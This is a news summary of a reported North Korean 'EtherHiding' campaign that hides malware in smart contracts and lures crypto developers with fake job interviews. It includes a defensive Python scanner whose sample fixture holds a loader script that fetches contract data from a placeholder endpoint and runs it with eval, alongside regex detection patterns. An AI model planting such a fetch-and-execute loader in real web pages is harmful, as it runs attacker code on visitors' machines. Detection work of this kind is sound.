North Korean Hackers’ New EtherHiding Crypto Heist

Summary
– North Korean threat actors are using EtherHiding, a blockchain-based technique, to deliver malware for cryptocurrency theft.
– EtherHiding embeds malicious code in smart contracts, using the blockchain as a resilient command-and-control server that resists takedowns.
– This method is difficult to counter due to its decentralized nature, pseudonymous transactions, and the inability to remove code from deployed contracts.
– The campaign involves social engineering tactics, such as fake recruiters on platforms like Telegram, to target cryptocurrency developers and steal data.
– A multi-stage malware infection process using JADESNOW, BEAVERTAIL, and INVISIBLEFERRET compromises systems across Windows, macOS, and Linux.
A North Korean hacking group has adopted a sophisticated blockchain-based method called EtherHiding to distribute malware and steal cryptocurrency. This technique embeds harmful code directly into smart contracts on a decentralized blockchain, effectively turning the distributed ledger into a durable command-and-control server for malicious operations. Google’s Threat Intelligence Group recently confirmed this is the first instance they have documented of a nation-state actor using such a strategy.
EtherHiding presents major challenges for cybersecurity professionals because it resists conventional takedown and blocking tactics. Since the malicious payload resides on a decentralized, permissionless blockchain, there is no central server that authorities or security teams can disable. The pseudonymous nature of blockchain transactions also makes it extremely difficult to identify the attackers behind the scheme.
Another troubling aspect is that once a malicious smart contract is deployed, only its owner can remove or alter the code. Attackers can update the harmful payload at any moment, allowing them to adapt quickly even if security researchers flag the contract on blockchain scanning platforms. Furthermore, hackers can retrieve the malicious code using read-only calls that don’t appear in public transaction records, making their actions even harder to detect.
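Because the loader fetches its payload with a read-only contract call rather than a transaction, the chain itself offers little to monitor; the practical detection point is the web page script that performs the fetch. The following is an added example, not code from Google's report or from the article, of a heuristic scanner that flags page scripts combining three behaviours the text describes: contacting a blockchain JSON-RPC endpoint, issuing a read-only call such as eth_call, and executing whatever comes back. The indicator patterns, the severity scale and the sample scripts (with placeholder endpoint and contract addresses) are all assumptions constructed for illustration.

```python
"""Heuristic scanner for EtherHiding-style loader scripts in web page content.

Added example, not from the report this page summarizes. The indicator regexes,
severity scale and SAMPLE_SCRIPTS below are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Behaviours that, combined in one page script, match the technique described
# above: reach a chain JSON-RPC endpoint, read from a contract without sending
# a transaction, and execute (or decode then execute) the returned bytes.
INDICATORS = {
    "rpc_endpoint": re.compile(
        r"https?://[^\s\"']*\b(?:rpc|bsc|binance|infura|alchemy)\b[^\s\"']*", re.I),
    "readonly_call": re.compile(
        r"\beth_call\b|\breadContract\s*\(|\bcallStatic\b|\beth_getStorageAt\b", re.I),
    "dynamic_exec": re.compile(
        r"\beval\s*\(|new\s+Function\s*\(|\bsetTimeout\s*\(\s*[\"'`]", re.I),
    "decode_step": re.compile(r"\batob\s*\(|fromCharCode|\.toString\s*\(\s*16\s*\)", re.I),
}
# 20-byte EVM contract addresses referenced by the script (for triage, not proof).
ADDRESS_RE = re.compile(r"0x[0-9a-fA-F]{40}")
CORE = {"rpc_endpoint", "readonly_call", "dynamic_exec"}


@dataclass
class Finding:
    script_id: str
    indicators: list   # sorted names of matched INDICATORS
    addresses: list    # contract addresses seen in the script
    severity: str      # "low" | "medium" | "high"


def severity_for(hits):
    """All three core behaviours together is the loader pattern; two is worth a look."""
    n = len(CORE & hits)
    return "high" if n == 3 else "medium" if n == 2 else "low"


def scan_script(script_id, source):
    hits = {name for name, rx in INDICATORS.items() if rx.search(source)}
    return Finding(script_id, sorted(hits),
                   sorted(set(ADDRESS_RE.findall(source))), severity_for(hits))


def scan_page(scripts):
    """scripts: mapping of script name/URL -> JavaScript source text."""
    return [scan_script(sid, src) for sid, src in scripts.items()]


def high_severity(scripts):
    return [f.script_id for f in scan_page(scripts) if f.severity == "high"]


# Constructed sample scripts: a plain analytics beacon, a legitimate dApp
# balance lookup (reads a contract but never executes the result), and a
# loader that evaluates what the read-only call returns. The endpoint and
# addresses are placeholders, not indicators from any real campaign.
RPC = "https://rpc.example.invalid"
ADDR_A = "0x" + "0" * 39 + "1"
ADDR_B = "0x" + "0" * 39 + "2"
SAMPLE_SCRIPTS = {
    "analytics.js":
        "window.track = function(e){ fetch('/collect', {method:'POST', body: JSON.stringify(e)}); };",
    "wallet-balance.js":
        f"const res = await fetch('{RPC}', {{method:'POST', body: JSON.stringify("
        f"{{jsonrpc:'2.0', method:'eth_call', params:[{{to:'{ADDR_A}', data:'0x'}}, 'latest'], id:1}})}});"
        "document.getElementById('bal').textContent = (await res.json()).result;",
    "loader.js":
        f"const r = await fetch('{RPC}', {{method:'POST', body: JSON.stringify("
        f"{{jsonrpc:'2.0', method:'eth_call', params:[{{to:'{ADDR_B}', data:'0x'}}, 'latest'], id:1}})}});"
        "const hex = (await r.json()).result; eval(atob(hex));",
}

if __name__ == "__main__":
    for f in scan_page(SAMPLE_SCRIPTS):
        print(f"{f.severity:6} {f.script_id:20} {f.indicators} {f.addresses}")
```

The regexes are deliberately broad, so treat a "high" result as a triage lead rather than a verdict: a legitimate dApp that reads a contract and then evaluates templated code would also trip it, which is why the scanner reports the matched indicators and any contract addresses alongside the severity. Where a page is flagged, the contract addresses it references can be checked on a block explorer and the returned data inspected before deciding whether to block the script.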
Google’s report describes EtherHiding as a move toward “next-generation bulletproof hosting,” in which the core strengths of blockchain (decentralization and immutability) are repurposed for criminal use. This approach gives attackers a resilient infrastructure that traditional security measures struggle to counter.
The EtherHiding method is part of a broader social engineering effort tracked by Palo Alto Networks as ‘Contagious Interview.’ In this campaign, North Korean operatives use JADESNOW malware to deploy a JavaScript version of INVISIBLEFERRET, leading to multiple cryptocurrency thefts. The targets are primarily developers and professionals in the cryptocurrency and tech industries, with the goals of stealing sensitive data and digital assets and maintaining long-term access to corporate systems.
Attackers pose as recruiters from fake companies, reaching out to potential victims on platforms like Telegram and Discord. They then deliver malware through what appear to be coding tests, software downloads, or technical interview materials. This multi-stage infection process, involving JADESNOW, BEAVERTAIL, and INVISIBLEFERRET, can compromise Windows, macOS, and Linux systems, demonstrating the campaign’s cross-platform reach and persistent threat to organizations worldwide.
(Source: Info Security)
